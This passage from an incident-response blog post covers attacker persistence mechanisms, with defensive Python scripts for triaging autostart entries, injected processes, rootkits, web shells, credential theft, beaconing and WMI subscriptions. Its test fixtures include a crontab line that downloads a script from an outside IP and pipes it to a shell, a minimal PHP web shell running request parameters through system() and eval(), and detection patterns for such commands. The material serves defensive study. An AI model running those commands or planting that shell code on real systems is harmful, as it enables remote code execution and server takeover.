Introduction
In the ever-evolving landscape of cybersecurity, understanding the persistence mechanisms used by attackers is crucial for effective incident response. This blog post walks through the persistence techniques attackers commonly use and, for each one, the specific artifacts and signs to look for during an incident investigation.
1. Registry Modifications
Context: The Windows Registry is a database storing low-level settings for the operating system and applications. Attackers add or change values under the autostart keys so that their program is launched every time a user logs on or the system boots, without any further interaction.
What to Look For:
- Unusual entries in HKCU\Software\Microsoft\Windows\CurrentVersion\Run, HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and other autostart keys such as the RunOnce keys and HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon (the Userinit and Shell values).
- Oddly named or misplaced registry keys and values, including names chosen to look like Windows or vendor components.
- Registry values referencing executables in unusual file paths (a user's AppData or Temp folder, ProgramData, C:\Users\Public), or that launch an interpreter such as powershell.exe with an encoded command.
2. Scheduled Tasks/Cron Jobs
Context: Scheduled tasks and cron jobs run scripts or programs at specific times or on triggers such as logon and boot. A malicious task can be hidden among dozens of legitimate ones and will re-launch the malware on a regular interval even if the running process is killed. On Windows the task definitions are stored as XML under C:\Windows\System32\Tasks and mirrored in the registry under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache; task registration is logged in Security Event ID 4698 (if task auditing is enabled) and in the Microsoft-Windows-TaskScheduler/Operational log (Event ID 106).
What to Look For:
- Tasks whose names or folders are unrelated to their actions, or that mimic Microsoft task names (attackers like to park a task under \Microsoft\Windows\... so it blends in).
- Task actions or cron commands that launch scripts with obfuscated or encoded content, or that download and execute something at run time.
- Cron jobs on Unix/Linux systems in the /etc/cron* directories, /etc/crontab, and the per-user spool (/var/spool/cron or /var/spool/cron/crontabs, listed for the current user with crontab -l).
3. Startup Folder
Context: The Startup folder holds programs and shortcuts that run when a user logs on; there is one per user and one shared by all users. Malicious files dropped here are easily overlooked because the folder is rarely inspected.
What to Look For:
- Unfamiliar executables or scripts in C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup or in the all-users folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
- Shortcuts (.lnk files) that point to unknown applications or scripts; resolve the target path and arguments of each shortcut rather than trusting its name or icon.
4. Service Creation
Context: Windows services run in the background, usually as SYSTEM, so creating a service or hijacking an existing one gives malware both persistence and privilege. Service configuration lives under HKLM\SYSTEM\CurrentControlSet\Services, and a new service installation is recorded in the System event log as Event ID 7045 (and in the Security log as 4697 when auditing is enabled).
What to Look For:
- Newly created services, especially those with unusual names or descriptions, or with no description at all.
- Modified binary paths (ImagePath) in existing services, compared against a known-good build or the same service on a healthy host.
- Services running from a user directory, ProgramData or temporary folders rather than System32 or Program Files.
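The checks described under sections 1 to 4 (Run keys, scheduled tasks and cron jobs, the Startup folder, service ImagePaths) all come down to the same question: what command will run, and does it look like something an administrator would have installed? The script below is an added example written for this post, not tooling from the original article. It triages a constructed set of autostart records shaped like the output of `reg query`, `Get-ScheduledTask`, a Startup-folder listing with each .lnk resolved to its target, `sc qc` and /etc/crontab; the record fields, the service baseline, the directory and launcher patterns are this example's own assumptions and would be taken from a gold image in practice.

```python
"""Triage autostart entries gathered from Run keys, scheduled tasks, the Startup
folder, service ImagePaths and a system crontab.

Added example for this post; not tooling from the original article. The records
are constructed, and the baseline and patterns below are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class Autostart:
    source: str   # where the entry was found (Run key, ScheduledTask, Startup, Service, crontab)
    name: str     # value name, task path, shortcut name, service name or cron schedule
    command: str  # the command line that will actually run


# Locations a normal user can write to; legitimate autostart binaries rarely live here.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\appdata\\|\\users\\public\\|\\windows\\temp\\"
    r"|\\programdata\\(?!microsoft\\)|(^|\s)/(tmp|var/tmp|dev/shm)/",
    re.IGNORECASE,
)

# Living-off-the-land launchers that are a red flag in an autostart location.
LOLBIN_PATTERNS = [
    (re.compile(r"powershell(\.exe)?.*\s-(e|ec|enc|encodedcommand)\s", re.I),
     "PowerShell with encoded command"),
    (re.compile(r"\bmshta(\.exe)?\b", re.I), "mshta launcher"),
    (re.compile(r"\bregsvr32(\.exe)?\b.*\s/i:", re.I), "regsvr32 scriptlet load"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.I), "download piped to a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b", re.I), "base64-decoded payload"),
]

# Assumed known-good ImagePath for a few services (take this from a clean build).
SERVICE_BASELINE = {
    "spooler": r"c:\windows\system32\spoolsv.exe",
    "wuauserv": r"c:\windows\system32\svchost.exe -k netsvcs -p",
}

# A system-crontab line: five schedule fields (or @reboot etc.), user, command.
CRON_LINE = re.compile(
    r"^(?P<sched>@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")


def parse_system_crontab(text: str) -> list[Autostart]:
    """Turn /etc/crontab text into Autostart records, skipping comments and variables."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            entries.append(Autostart("/etc/crontab",
                                     f"{m['sched']} ({m['user']})", m["cmd"]))
    return entries


def reasons(entry: Autostart) -> list[str]:
    """Return the reasons this entry deserves a closer look (empty list if none)."""
    found = []
    if USER_WRITABLE.search(entry.command):
        found.append("runs from a user-writable directory")
    for pattern, label in LOLBIN_PATTERNS:
        if pattern.search(entry.command):
            found.append(label)
    if entry.source == "Service":
        expected = SERVICE_BASELINE.get(entry.name.lower())
        if expected and entry.command.strip('"').lower() != expected:
            found.append(f"ImagePath differs from baseline ({expected})")
    return found


def triage(entries: list[Autostart]) -> list[tuple[Autostart, list[str]]]:
    """Return only the entries that have at least one reason, in input order."""
    return [(e, r) for e in entries if (r := reasons(e))]


# Constructed sample data, not taken from a real host.
SAMPLE = [
    Autostart(r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
              r"C:\Windows\System32\SecurityHealthSystray.exe"),
    Autostart(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDriveUpdate",
              r"C:\Users\jdoe\AppData\Roaming\svchost.exe"),
    Autostart("ScheduledTask", r"\Microsoft\Windows\Maintenance\WinSAT",
              "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    Autostart("Startup", "Adobe Updater.lnk", r"C:\Users\Public\adobeupd.exe"),  # resolved .lnk target
    Autostart("Service", "Spooler", r"C:\Windows\System32\spoolsv.exe"),
    Autostart("Service", "wuauserv", r"C:\ProgramData\wu\svchost.exe -k netsvcs"),
]
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root curl -s http://198.51.100.7/u.sh | sh
@reboot www-data /dev/shm/.x/kworker
"""

if __name__ == "__main__":
    for entry, why in triage(SAMPLE + parse_system_crontab(SAMPLE_CRONTAB)):
        print(f"[{entry.source}] {entry.name}: {entry.command}\n    -> {'; '.join(why)}")
```

Every hit is a lead, not a verdict: the Spooler entry passes because its ImagePath matches the baseline, while the fake wuauserv entry is flagged twice (wrong path and user-writable location). The task parked under \Microsoft\Windows\Maintenance is caught only by its encoded PowerShell action, which is why the triage looks at the command rather than the name.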
5. DLL Injection and Hijacking
Context: Malware may inject code into a legitimate running process so that its activity is attributed to that process, or plant a DLL where a legitimate program will load it by search order (DLL hijacking) so that the trusted program carries the payload. Both evade detection that looks only at process names.
What to Look For:
- Processes executing from abnormal locations (e.g., a process named svchost.exe running from a user directory instead of System32).
- Unexpected changes in file sizes, hashes or timestamps of system DLLs, and DLLs with system-library names loaded from an application or user folder; verify suspicious files with their Authenticode signature (Get-AuthenticodeSignature) or a hash from a known-good copy.
- Anomalies in process behavior, like a text editor process making network requests or spawning command shells.
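The three signs above can be checked mechanically once a process listing is joined with each process's loaded modules and connection count. The following is an added example for this post, not code from the original article: it runs over a constructed process table shaped like the join of a process list (pid, name, image path), the modules from `tasklist /m` or Sysmon Event ID 7, and the connection count from `Get-NetTCPConnection -OwningProcess`. The expected-location table, the list of hijack-prone DLL names and the no-network list are assumptions to be tuned per environment.

```python
"""Spot system-process masquerading, out-of-place loaded modules and processes
that should not be talking to the network.

Added example for this post, not code from the original article. The process
table is constructed; the baselines below are assumptions.
"""
import ntpath
from dataclasses import dataclass, field


@dataclass
class Proc:
    pid: int
    name: str
    image: str                                   # full path of the on-disk image
    modules: list[str] = field(default_factory=list)
    tcp_connections: int = 0


# Directories core Windows binaries are expected to load from (assumed baseline).
SYSTEM_IMAGE_DIRS = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "lsass.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows"},
    "rundll32.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}
# DLL names frequently planted next to an application for search-order hijacking.
HIJACK_PRONE_DLLS = {"version.dll", "dbghelp.dll", "winmm.dll", "cryptbase.dll", "wtsapi32.dll"}
# Programs that have no business holding TCP connections (assumed for the example).
NO_NETWORK_EXPECTED = {"notepad.exe", "calc.exe", "mspaint.exe"}


def _dir(path: str) -> str:
    return ntpath.dirname(path).lower()


def _in_windows_dir(path: str) -> bool:
    """True if the module lives under the Windows directory, excluding the writable Temp folder."""
    d = _dir(path)
    return d.startswith(r"c:\windows") and not d.startswith(r"c:\windows\temp")


def check_process(p: Proc) -> list[str]:
    """Return findings for one process; an empty list means nothing stood out."""
    findings = []
    name = p.name.lower()
    if name in SYSTEM_IMAGE_DIRS and _dir(p.image) not in SYSTEM_IMAGE_DIRS[name]:
        findings.append(f"{p.name} running from {_dir(p.image)} instead of a system directory")
    for mod in p.modules:
        base = ntpath.basename(mod).lower()
        if name in SYSTEM_IMAGE_DIRS and not _in_windows_dir(mod):
            findings.append(f"system process loaded {mod} from outside the Windows directory")
        elif base in HIJACK_PRONE_DLLS and not _in_windows_dir(mod):
            findings.append(f"{base} loaded from {_dir(mod)}: possible DLL search-order hijack")
    if name in NO_NETWORK_EXPECTED and p.tcp_connections > 0:
        findings.append(f"{p.name} holds {p.tcp_connections} TCP connection(s)")
    return findings


def scan(procs: list[Proc]) -> dict[int, list[str]]:
    """Map pid -> findings for every process that produced at least one finding."""
    return {p.pid: f for p in procs if (f := check_process(p))}


# Constructed sample process table, not captured from a real host.
SAMPLE = [
    Proc(812, "svchost.exe", r"C:\Windows\System32\svchost.exe",
         [r"C:\Windows\System32\ntdll.dll", r"C:\Windows\System32\rpcss.dll"]),
    Proc(4120, "svchost.exe", r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe"),
    Proc(5012, "explorer.exe", r"C:\Windows\explorer.exe",
         [r"C:\Windows\System32\shell32.dll", r"C:\Users\Public\Libraries\helper.dll"]),
    Proc(6240, "teams.exe", r"C:\Program Files\Teams\teams.exe",
         [r"C:\Program Files\Teams\teams.exe", r"C:\Program Files\Teams\version.dll"]),
    Proc(7100, "notepad.exe", r"C:\Windows\System32\notepad.exe",
         [r"C:\Windows\System32\ntdll.dll"], tcp_connections=3),
]

if __name__ == "__main__":
    for pid, findings in scan(SAMPLE).items():
        for finding in findings:
            print(f"pid {pid}: {finding}")
```

The version.dll hit is the classic hijack shape: a DLL with a system-library name sitting in an application folder, where the loader finds it before the real one in System32. Confirm it by checking the file's signature and hash before acting on it.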
6. Rootkits
Context: Rootkits are designed to hide the existence of malware, making them particularly insidious.
What to Look For:
- Discrepancies between system reports from different tools or vantage points (e.g., a process visible in one process listing but not another, a PID that owns a network socket but is absent from the process list, or disk usage that the file listing cannot account for).
- Signs of tampering in system logs or missing logs.
- Unexplained system behavior or performance issues.
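Two of these signs can be turned into repeatable checks: comparing the same process list from several vantage points, and looking for silences in logs that should never go quiet. The code below is an added example for this post, not from the original article. The process views are constructed PID sets as they might be gathered from `ps`, a listing of /proc and `ss -p` on a Linux host, and the log lines are constructed syslog-format lines; the gap threshold is an assumption that depends on how chatty the host normally is.

```python
"""Cross-view process comparison and log-gap detection for rootkit triage.

Added example for this post, not code from the original article. The views and
log lines are constructed; the gap threshold is an assumption.
"""
import re
from datetime import datetime, timedelta
from typing import Optional


def hidden_pids(full_views: dict[str, set[int]],
                partial_views: Optional[dict[str, set[int]]] = None) -> dict[int, list[str]]:
    """Return pid -> names of the views that can see it, for every PID that is
    missing from at least one *full* view. A partial view (socket owners, for
    example) only adds evidence that a PID exists; absence from it proves nothing."""
    partial_views = partial_views or {}
    all_views = {**full_views, **partial_views}
    everything = set().union(*all_views.values())
    result = {}
    for pid in sorted(everything):
        if any(pid not in view for view in full_views.values()):
            result[pid] = [name for name, view in all_views.items() if pid in view]
    return result


SYSLOG_TS = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2} \d{2}:\d{2}:\d{2}) ")


def log_gaps(lines: list[str], max_gap: timedelta,
             year: int = 2024) -> list[tuple[str, str, timedelta]]:
    """Return (previous_ts, next_ts, gap) for consecutive entries further apart
    than max_gap, or that jump backwards in time. Syslog stamps carry no year,
    so one is supplied. A silence on a normally busy host is a reason to pull
    the same window from a remote log collector and compare."""
    stamps = []
    for line in lines:
        m = SYSLOG_TS.match(line)
        if m:
            stamps.append(datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"))
    gaps = []
    for prev, nxt in zip(stamps, stamps[1:]):
        if nxt - prev > max_gap or nxt < prev:
            gaps.append((prev.isoformat(), nxt.isoformat(), nxt - prev))
    return gaps


# Constructed sample views: PID 4411 owns a socket and exists in /proc but ps cannot see it.
VIEWS_FULL = {"ps": {1, 412, 917, 1650}, "/proc": {1, 412, 917, 1650, 4411}}
VIEWS_PARTIAL = {"ss -p": {917, 4411}}

# Constructed sample log with a hole of more than two hours.
SAMPLE_LOG = [
    "Mar 14 02:00:01 web01 CRON[2210]: (root) CMD (run-parts /etc/cron.hourly)",
    "Mar 14 02:05:17 web01 sshd[2290]: Accepted publickey for deploy from 10.0.0.5 port 41100 ssh2",
    "Mar 14 02:05:18 web01 systemd-logind[710]: New session 42 of user deploy.",
    "Mar 14 02:06:40 web01 sudo: deploy : TTY=pts/0 ; PWD=/home/deploy ; COMMAND=/bin/systemctl restart app",
    "Mar 14 04:30:09 web01 sshd[3011]: Accepted publickey for deploy from 10.0.0.5 port 41220 ssh2",
    "Mar 14 04:31:00 web01 systemd-logind[710]: Removed session 42.",
]

if __name__ == "__main__":
    for pid, seen in hidden_pids(VIEWS_FULL, VIEWS_PARTIAL).items():
        print(f"pid {pid} hidden from a full view; visible in: {', '.join(seen)}")
    for prev, nxt, gap in log_gaps(SAMPLE_LOG, timedelta(minutes=30)):
        print(f"log silent for {gap} between {prev} and {nxt}")
```

Run the collection steps from a trusted source (a live-response toolkit or a disk image) as well as from the suspect host; a user-mode rootkit that hooks the libc or ntdll calls behind `ps` and Task Manager will lie to every tool that uses those calls, which is exactly why disagreement between vantage points is the signal.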
7. Web Shells
Context: After compromising a web server, attackers can maintain access through web shells, which are scripts allowing remote control.
What to Look For:
- Unusual files in web directories, especially with server-side extensions such as .php, .asp, .aspx, .jsp or .jspx, and particularly inside upload, image or cache directories that should only hold static content.
- Modifications in web server configuration files, including handler mappings that make an unexpected extension executable.
- Abnormal entries in web server access logs, such as frequent POST requests to the same file from one or two client IPs, requests with no Referer or with a scripting-library User-Agent, and query strings carrying command-like parameters.
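Both the log-side and file-side signs above can be scripted. The example below was added for this post and is not code from the original article: it parses constructed access-log lines in Apache/nginx combined format, flags paths that are being driven the way a shell is (repeated POSTs from one or two clients with no Referer, or command-style query parameters), and scans constructed PHP sources for patterns common in web shells. The thresholds and signature list are this example's assumptions, and a hit is a reason to read the file, not proof.

```python
"""Hunt for web shells in access logs and in files under the web root.

Added example for this post, not code from the original article. Log lines and
PHP snippets are constructed; thresholds and signatures are assumptions.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
SUSPICIOUS_QUERY = re.compile(r"[?&](cmd|exec|command|shell|pass|c)=", re.I)


def suspicious_paths(lines, min_posts=5, max_ips=2):
    """Return path -> stats for paths that look shell-driven: mostly POSTs from
    one or two client IPs with no Referer (hand-written clients rarely send one),
    or any request carrying a command-style query string."""
    stats = defaultdict(lambda: {"posts": 0, "gets": 0, "ips": set(),
                                 "no_referer": 0, "cmd_query": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        s = stats[m["path"].split("?", 1)[0]]
        s["ips"].add(m["ip"])
        s["posts" if m["method"] == "POST" else "gets"] += 1
        if m["referer"] in ("", "-"):
            s["no_referer"] += 1
        if SUSPICIOUS_QUERY.search(m["path"]):
            s["cmd_query"] += 1
    flagged = {}
    for path, s in stats.items():
        total = s["posts"] + s["gets"]
        shell_like = (s["posts"] >= min_posts and len(s["ips"]) <= max_ips
                      and s["no_referer"] == total)
        if shell_like or s["cmd_query"]:
            flagged[path] = {**s, "ips": sorted(s["ips"])}
    return flagged


# Source patterns common in PHP web shells.
SHELL_SIGNATURES = [
    (re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
     "eval of decoded payload"),
    (re.compile(r"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)", re.I),
     "command execution fed from request data"),
    (re.compile(r"\bassert\s*\(\s*\$_(GET|POST|REQUEST)", re.I), "assert() used as eval"),
    (re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", re.I), "preg_replace /e modifier"),
    (re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\[[^\]]+\]\s*\(", re.I),
     "request parameter called as a function"),
]


def scan_source(text: str) -> list[str]:
    """Return the signature labels that match a file's contents."""
    return [label for pattern, label in SHELL_SIGNATURES if pattern.search(text)]


# Constructed access log: normal traffic plus a shell being driven in /uploads/images/.
SAMPLE_LOG = [
    '203.0.113.45 - - [14/Mar/2024:02:10:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.45 - - [14/Mar/2024:02:10:03 +0000] "GET /about.php HTTP/1.1" 200 2210 "https://example.test/index.php" "Mozilla/5.0"',
    '198.51.100.8 - - [14/Mar/2024:02:11:10 +0000] "POST /contact.php HTTP/1.1" 302 0 "https://example.test/contact.php" "Mozilla/5.0"',
] + [
    f'192.0.2.77 - - [14/Mar/2024:02:{12 + i:02d}:00 +0000] "POST /uploads/images/cache.php HTTP/1.1" 200 {300 + i} "-" "python-requests/2.31.0"'
    for i in range(6)
] + [
    '192.0.2.77 - - [14/Mar/2024:02:20:00 +0000] "GET /uploads/images/cache.php?cmd=id HTTP/1.1" 200 128 "-" "python-requests/2.31.0"',
]

# Constructed PHP sources: a minimal shell and a benign cache reader.
SAMPLE_SHELL = """<?php
if (isset($_POST['k']) && $_POST['k'] === 'x') { system($_POST['c']); }
eval(base64_decode($_REQUEST['p']));
"""
SAMPLE_CLEAN = """<?php
$cache = json_decode(file_get_contents(__DIR__ . '/cache.json'), true);
echo htmlspecialchars($cache['title'] ?? '');
"""

if __name__ == "__main__":
    for path, s in suspicious_paths(SAMPLE_LOG).items():
        print(f"{path}: {s['posts']} POSTs from {s['ips']}, {s['cmd_query']} command-style queries")
    print("shell signatures:", scan_source(SAMPLE_SHELL), "| clean:", scan_source(SAMPLE_CLEAN))
```

Real shells are frequently obfuscated past these patterns (string concatenation, chr() sequences, encoded includes), so treat the log-side check as the primary detector and the source scan as a quick first pass before diffing the web root against the deployed release.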
8. Credential Theft
Context: Stealing credentials allows attackers to masquerade as legitimate users, maintaining access without raising suspicion.
What to Look For:
- Bursts of failed logons (Windows Event ID 4625, sshd "Failed password" lines in auth.log), especially one source trying many accounts (password spraying) or a success that immediately follows a run of failures.
- Evidence of credential-dumping tools like Mimikatz: processes opening handles to lsass.exe with read access (Sysmon Event ID 10), copies of the SAM or NTDS.dit, or LSASS memory dumps on disk.
- Anomalies in user behavior, such as accessing data not relevant to their role, or logons at unusual hours and from unusual hosts.
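The authentication-log and LSASS-access signs above are simple to check in bulk. The script below is an added example for this post, not code from the original article. It classifies constructed sshd lines in Linux auth.log format into password spraying, brute force and success-after-failures patterns, and examines constructed records carrying the fields of Sysmon Event ID 10 (ProcessAccess) for processes that opened lsass.exe with the PROCESS_VM_READ right that credential dumpers need. The thresholds and the allowlist of processes expected to read LSASS are assumptions.

```python
"""Triage authentication failures and LSASS access for credential-theft signs.

Added example for this post, not code from the original article. The auth.log
lines and Sysmon records are constructed; thresholds and allowlist are assumptions.
"""
import re
from collections import defaultdict

AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")


def analyse_auth_log(lines, spray_users=5, brute_attempts=4):
    """Single pass over auth.log lines. Returns three lists:
    password_spray      - source IPs that failed against spray_users or more accounts
    brute_force         - (ip, user) pairs with brute_attempts or more failures
    success_after_failures - (ip, user) accepted after earlier failures from that ip"""
    failures = defaultdict(lambda: defaultdict(int))   # ip -> user -> failed count
    findings = {"password_spray": [], "brute_force": [], "success_after_failures": []}
    for line in lines:
        m = AUTH_RE.search(line)
        if not m:
            continue
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failures[ip][user] += 1
        elif failures.get(ip, {}).get(user, 0) > 0:   # .get avoids creating entries
            findings["success_after_failures"].append((ip, user))
    for ip, users in failures.items():
        if len(users) >= spray_users:
            findings["password_spray"].append(ip)
        for user, n in users.items():
            if n >= brute_attempts:
                findings["brute_force"].append((ip, user))
    return findings


PROCESS_VM_READ = 0x0010   # access right needed to read LSASS memory
# Processes that legitimately open LSASS with read access (assumed allowlist; tune per host).
LSASS_READERS_EXPECTED = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}


def lsass_access_findings(events):
    """From Sysmon Event ID 10 records, return (SourceImage, GrantedAccess) for
    processes that opened lsass.exe with PROCESS_VM_READ and are not expected to."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 10 or not ev["TargetImage"].lower().endswith("\\lsass.exe"):
            continue
        granted = int(ev["GrantedAccess"], 16)
        source = ev["SourceImage"].rsplit("\\", 1)[-1].lower()
        if granted & PROCESS_VM_READ and source not in LSASS_READERS_EXPECTED:
            hits.append((ev["SourceImage"], ev["GrantedAccess"]))
    return hits


# Constructed auth.log: a spray across six accounts, then four failures and a success for one user.
SPRAYED_USERS = ["admin", "oracle", "test", "backup", "ubuntu", "git"]
SAMPLE_AUTH = [
    f"Mar 14 02:1{i}:01 web01 sshd[22{i}0]: Failed password for invalid user {u} from 203.0.113.9 port 5{i}122 ssh2"
    for i, u in enumerate(SPRAYED_USERS)
] + [
    f"Mar 14 02:20:{10 + i:02d} web01 sshd[2290]: Failed password for deploy from 198.51.100.23 port 4110{i} ssh2"
    for i in range(4)
] + [
    "Mar 14 02:20:30 web01 sshd[2299]: Accepted password for deploy from 198.51.100.23 port 41105 ssh2",
    "Mar 14 02:25:00 web01 sshd[2305]: Accepted publickey for alice from 10.0.0.5 port 50000 ssh2",
]

# Constructed Sysmon Event ID 10 records (GrantedAccess as Sysmon logs it, hex string).
SAMPLE_SYSMON = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Users\jdoe\Downloads\mk.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    print(analyse_auth_log(SAMPLE_AUTH))
    print(lsass_access_findings(SAMPLE_SYSMON))
```

The svchost.exe record passes because 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) carries no read right, while 0x1010 from a binary in a Downloads folder is the shape of a credential dump in progress. The equivalent Windows check uses Event ID 4625 grouped by IpAddress and TargetUserName.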
9. Backdoors and RATs
Context: These tools provide remote control over a system, often with extensive capabilities.
What to Look For:
- Unfamiliar or unexpected outbound network connections, especially ones that recur on a fixed interval (beaconing) to the same destination.
- Processes or services that are unknown or have no legitimate purpose, particularly ones whose names imitate Windows components.
- Listening ports that do not correspond to known applications or services on that host.
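Listening ports can be compared against a per-host baseline, and beaconing can be measured rather than eyeballed: an implant on a timer produces connection intervals with very little jitter, while browsers and updaters connect in bursts. The script below is an added example for this post, not code from the original article. It works on a constructed listener table and constructed connection events shaped like `netstat -ano` or `Get-NetTCPConnection` joined with the process list and sampled over a few minutes; the expected-listener set and the jitter threshold are assumptions.

```python
"""Flag unexpected listeners and periodic (beacon-like) outbound connections.

Added example for this post, not code from the original article. The tables
below are constructed; the baseline and threshold are assumptions.
"""
from collections import defaultdict
from statistics import mean, pstdev

# (process name, port) pairs expected to listen on this kind of host (assumed baseline).
EXPECTED_LISTENERS = {("system", 445), ("svchost.exe", 135), ("svchost.exe", 3389),
                      ("lsass.exe", 49664)}


def unexpected_listeners(listeners):
    """listeners: iterable of (pid, process_name, port). Return those not in the baseline."""
    return [(pid, name, port) for pid, name, port in listeners
            if (name.lower(), port) not in EXPECTED_LISTENERS]


def beacons(events, min_connections=6, max_jitter=0.15):
    """events: iterable of (timestamp_seconds, process_name, dst_ip, dst_port).
    Group by (process, destination) and report groups whose inter-connection
    intervals are nearly constant (stdev/mean at or below max_jitter).
    Returns (process, dst_ip, dst_port, mean_interval, jitter) tuples."""
    by_dest = defaultdict(list)
    for ts, proc, ip, port in events:
        by_dest[(proc, ip, port)].append(ts)
    found = []
    for key, stamps in by_dest.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        jitter = pstdev(gaps) / avg if avg else 0.0
        if jitter <= max_jitter:
            found.append((*key, round(avg, 1), round(jitter, 3)))
    return found


# Constructed listener table: two entries are not in the baseline.
SAMPLE_LISTENERS = [
    (4, "System", 445), (912, "svchost.exe", 135), (688, "lsass.exe", 49664),
    (5120, "wlogon.exe", 4444), (3320, "httpd.exe", 8080),
]

# Constructed connection events (seconds since capture start). The "updater.exe"
# series checks in roughly every minute; the browser series is bursty.
SAMPLE_EVENTS = (
    [(t, "updater.exe", "203.0.113.50", 443) for t in (0, 61, 119, 181, 240, 299, 361, 420)]
    + [(t, "chrome.exe", "93.184.216.34", 443) for t in (0, 3, 40, 47, 167, 175, 176, 300)]
    + [(t, "outlook.exe", "52.96.0.10", 443) for t in (5, 65, 125, 185)]
)

if __name__ == "__main__":
    for pid, name, port in unexpected_listeners(SAMPLE_LISTENERS):
        print(f"unexpected listener: pid {pid} {name} on port {port}")
    for proc, ip, port, avg, jitter in beacons(SAMPLE_EVENTS):
        print(f"beacon-like: {proc} -> {ip}:{port} every ~{avg}s (jitter {jitter})")
```

Commercial command-and-control frameworks add deliberate random jitter to their sleep interval, so loosen `max_jitter` (or look at the long-run distribution of intervals rather than their standard deviation) when the expected tooling is more sophisticated than a fixed timer. The outlook.exe series is ignored only because it has too few samples, not because it looks benign.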
10. WMI Event Subscriptions
Context: WMI can be used for legitimate system management but also for executing payloads in response to specific events. A permanent WMI event subscription consists of an __EventFilter (the trigger, a WQL query), a consumer such as CommandLineEventConsumer or ActiveScriptEventConsumer (the payload) and a __FilterToConsumerBinding that ties them together, all stored in the root\subscription namespace and surviving reboots with no file or Run key to find.
What to Look For:
- Unknown or suspicious WMI event subscriptions; enumerate the filters, consumers and bindings in root\subscription and compare them with a clean system, where the only default binding is the SCM Event Log Filter to the SCM Event Log Consumer.
- Scripts or binaries referenced in WMI filters or consumers that are unusual or located in odd directories, and filters that trigger on uptime or time-of-day so that they fire shortly after every boot.
- Logs indicating the creation of new WMI consumers or filters: Event ID 5861 in Microsoft-Windows-WMI-Activity/Operational records permanent consumer registration, and Sysmon Event IDs 19, 20 and 21 record filter, consumer and binding creation.
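A permanent subscription only makes sense once its three parts are joined back together, which is what the following added example does. It is written for this post and is not code from the original article: the three record lists are constructed to resemble the instances `Get-CimInstance -Namespace root/subscription` returns for __EventFilter, the consumer classes and __FilterToConsumerBinding. The SCM Event Log binding in the sample is the one present on a stock Windows install; the "Updater" records are a constructed attacker-style entry, and the known-good set and trigger patterns are assumptions.

```python
"""Reconstruct permanent WMI event subscriptions and flag the ones that execute code.

Added example for this post, not code from the original article. Records are
constructed; the known-good baseline and trigger patterns are assumptions.
"""
import re

# Consumer classes that run arbitrary code when their filter fires.
EXECUTING_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# (filter, consumer class, consumer name) bindings on a clean system (assumed baseline).
KNOWN_GOOD_BINDINGS = {("SCM Event Log Filter", "NTEventLogEventConsumer", "SCM Event Log Consumer")}
# Trigger queries favoured for persistence: clock or uptime based, so they fire after every boot.
TIMER_TRIGGERS = re.compile(
    r"Win32_PerfFormattedData_PerfOS_System|Win32_LocalTime|__InstanceModificationEvent", re.I)
# Binding references look like: __EventFilter.Name="SCM Event Log Filter"
REF_RE = re.compile(r'^(?P<cls>\w+)\.Name="(?P<name>[^"]+)"$')


def resolve_bindings(filters, consumers, bindings):
    """Join every binding to its filter and consumer. Returns one dict per binding
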